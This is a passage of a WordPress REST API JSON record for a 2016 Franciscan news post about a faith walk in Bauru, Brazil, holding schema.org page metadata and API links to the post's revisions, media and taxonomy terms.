name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2016\/04\/820-02.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2016\/04\/820-02.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html","name":"F\u00e9 e supera\u00e7\u00e3o na Caminhada Franciscana em Bauru - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html#primaryimage"},"datePublished":"2016-04-25T11:42:07+00:00","dateModified":"2020-03-27T16:51:20+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"F\u00e9 e supera\u00e7\u00e3o na Caminhada Franciscana em Bauru"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/108051"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=108051"}],"version-history":[{"count":1,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/108051\/revisions"}],"predecessor-version":[{"id":222733,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/108051\/revisions\/222733"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/204308"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=108051"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=108051"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=108051"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}